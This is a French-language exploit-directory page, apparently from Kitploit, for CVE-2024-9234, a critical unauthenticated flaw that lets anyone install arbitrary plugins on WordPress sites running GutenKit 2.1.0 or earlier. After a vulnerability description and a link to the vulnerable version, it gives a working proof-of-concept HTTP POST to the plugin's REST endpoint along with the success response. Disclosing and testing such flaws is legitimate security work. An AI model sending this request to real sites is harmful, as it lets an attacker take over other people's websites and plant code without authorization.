Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9234 — GutenKit <= 2.1.0 - Téléchargement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-9234
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-9234

CVE-2024-9234

GutenKit <= 2.1.0 - Téléchargement de fichier arbitraire non authentifié

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9234

GutenKit <= 2.1.0 - Téléchargement de fichier arbitraire non authentifié

Description

Le plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor pour WordPress est vulnérable aux téléchargements de fichiers arbitraires en raison d'un manque de vérification des capacités dans la fonction install_and_activate_plugin_from_external() (point de terminaison REST API install-active-plugin) dans toutes les versions jusqu'à la version 2.1.0 incluse. Cela permet à des attaquants non authentifiés d'installer et d'activer des plugins arbitraires, ou d'utiliser la fonctionnalité pour télécharger des fichiers arbitraires déguisés en plugins.

root@kitploit:~
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon

Lien de téléchargement : Télécharger gutenkit-blocks-addon Version 2.1.0

POC

root@kitploit:~
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114

{
  "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
  "slug": "popularis-extra"
}
root@kitploit:~
{"success":true,"data":"Plugin installed successfully!"}
Télécharger l’outil